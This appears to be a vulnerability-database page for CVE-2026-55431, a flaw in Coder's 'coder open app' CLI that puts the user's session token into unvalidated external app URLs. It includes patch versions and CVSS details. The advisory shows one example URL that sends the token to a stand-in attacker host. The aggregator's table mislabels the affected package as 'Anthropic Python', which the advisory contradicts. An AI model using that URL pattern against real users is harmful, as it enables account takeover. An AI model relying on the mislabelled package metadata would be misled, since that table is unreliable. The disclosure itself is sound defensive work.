CVE-2026-55431

GHSA-v54h-cp2w-9x4g HIGH
Published July 6, 2026

### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical...

Full CISO analysis pending enrichment.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Anthropic Python go >= 2.34.0, < 2.34.2 2.34.2
3.7K 5.4K dependents Pushed 4d ago 95% patched ~3d to patch Full package profile →

Do you use Anthropic Python? You're affected.

How severe is it?

CVSS 3.1
7.7 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC High
PR Low
UI Required
S Changed
C High
I High
A None

What should I do?

Patch available

Update Anthropic Python to version 2.34.2

Which compliance frameworks are affected?

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is CVE-2026-55431?

### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs. ### Impact Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like `https://attacker.example/?t=$SESSION_TOKEN`. Running `coder open app` then sends the user's session token to the attacker and enables full account impersonation for the token's lifetime. The same path can invoke arbitrary local URI scheme handlers. Exploitation requires the user to run `coder open app` against a workspace that contains a malicious external app. ### Patches The fix applies a URL-scheme allowlist in the CLI and limits `$SESSION_TOKEN` substitution to trusted destinations like the web frontend. The fix was backported to all supported release lines: | Release line | Patched version | |---|---| | 2.34 | [v2.34.2](https://github.com/coder/coder/releases/tag/v2.34.2) | | 2.33 | [v2.33.8](https://github.com/coder/coder/releases/tag/v2.33.8) | | 2.32 | [v2.32.7](https://github.com/coder/coder/releases/tag/v2.32.7) | | 2.29 (ESR) | [v2.29.17](https://github.com/coder/coder/releases/tag/v2.29.17) | ### Workarounds Avoid running `coder open app` for untrusted workspaces. ### Resources - Fix: #26146 ### Credits Coder would like to thank Anthropic's Security Team (ANT-2026-22457) for independently disclosing this issue!

Is CVE-2026-55431 actively exploited?

No confirmed active exploitation of CVE-2026-55431 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-55431?

Update to patched version: Anthropic Python 2.34.2.

What is the CVSS score for CVE-2026-55431?

CVE-2026-55431 has a CVSS v3.1 base score of 7.7 (HIGH).

What are the technical details?

Original Advisory

### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs. ### Impact Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like `https://attacker.example/?t=$SESSION_TOKEN`. Running `coder open app` then sends the user's session token to the attacker and enables full account impersonation for the token's lifetime. The same path can invoke arbitrary local URI scheme handlers. Exploitation requires the user to run `coder open app` against a workspace that contains a malicious external app. ### Patches The fix applies a URL-scheme allowlist in the CLI and limits `$SESSION_TOKEN` substitution to trusted destinations like the web frontend. The fix was backported to all supported release lines: | Release line | Patched version | |---|---| | 2.34 | [v2.34.2](https://github.com/coder/coder/releases/tag/v2.34.2) | | 2.33 | [v2.33.8](https://github.com/coder/coder/releases/tag/v2.33.8) | | 2.32 | [v2.32.7](https://github.com/coder/coder/releases/tag/v2.32.7) | | 2.29 (ESR) | [v2.29.17](https://github.com/coder/coder/releases/tag/v2.29.17) | ### Workarounds Avoid running `coder open app` for untrusted workspaces. ### Resources - Fix: #26146 ### Credits Coder would like to thank Anthropic's Security Team (ANT-2026-22457) for independently disclosing this issue!

Weaknesses (CWE)

CWE-522 — Insufficiently Protected Credentials: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.

  • [Architecture and Design] Use an appropriate security mechanism to protect the credentials.
  • [Architecture and Design] Make appropriate use of cryptography to protect the credentials.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

Timeline

Published
July 6, 2026
Last Modified
July 6, 2026
First Seen
July 7, 2026

Related Vulnerabilities